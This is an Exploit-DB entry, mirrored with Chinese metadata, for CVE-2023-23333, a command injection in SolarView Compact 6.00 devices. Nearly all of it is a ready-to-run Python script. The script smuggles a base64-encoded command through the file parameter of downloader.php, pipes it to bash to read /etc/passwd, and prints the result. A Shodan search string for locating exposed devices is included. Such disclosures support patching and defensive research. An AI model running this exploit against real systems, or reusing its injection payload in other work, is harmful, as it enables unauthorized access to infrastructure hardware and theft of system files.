SolarView Compact 6.00 – Command Injection

• Exploit Database
• 36 阅读

• 作者： ByteHunter
  日期： 2024-03-14
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51886/

• #- Exploit Title: SolarView Compact 6.00 - Command Injection
  #- Shodan Dork: http.html:"solarview compact"
  #- Exploit Author: ByteHunter
  #- Email: 0xByteHunter@proton.me
  #- Version: 6.00
  #- Tested on: 6.00
  #- CVE : CVE-2023-23333
  
  
  import argparse
  import requests
  
  def vuln_check(ip_address, port):
  url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"
  response = requests.get(url)
  if response.status_code == 200:
  output = response.text
  if "root" in output:
  print("Vulnerability detected: Command Injection possible.")
  print(f"passwd file content:\n{response.text}")
  
  
  else:
  print("No vulnerability detected.")
  else:
  print("Error: Unable to fetch response.")
  
  def main():
  parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ")
  parser.add_argument("-i", "--ip", help="IP address of the target device", required=True)
  parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int)
  args = parser.parse_args()
  
  ip_address = args.ip
  port = args.port
  vuln_check(ip_address, port)
  
  if __name__ == "__main__":
  main()